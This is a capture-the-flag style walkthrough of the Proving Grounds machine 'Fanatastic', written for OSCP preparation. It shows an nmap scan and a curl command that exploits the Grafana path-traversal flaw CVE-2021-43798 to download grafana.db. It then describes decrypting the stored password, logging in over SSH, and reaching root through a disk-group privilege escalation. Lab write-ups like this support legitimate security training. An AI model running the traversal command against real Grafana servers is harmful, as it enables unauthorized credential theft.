Proving grounds:Fanatastic

Today we will take a look at Proving grounds: Fanatastic. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

• Network scan

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
3000/tcp open ppp?
9090/tcp open zeus-admin?

• Grafana (3000)

Search exploits for Grafana

Grafana 8.3.0 - Directory Traversal and Arbitrary File Read - CVE-2021-43798 | VK9 Security

Let’s continue according to what is shown on the page.

curl — path-as-is http://192.168.168.181:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -O grafana.db

The data_source table contains the credentials we need.

Decrypt the password using exploit

GitHub - jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability

Replace with the credentials you have.

Error

└─# go run AESDecrypt.go 
AESDecrypt.go:12:2: no required module provides package golang.org/x/crypto/pbkdf2: go.mod file not found in current directory or any parent directory; see ‘go help modules’

Solve

Linux Exploitation Archives | VK9 Security

After finding the password, we can log in with ssh.

• Privilage

We encountered such an exploit when using Linpeas.

Use it and get root’s ssh credentials.

Disk group privilege escalation | VK9 Security

Now login to root with ssh

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”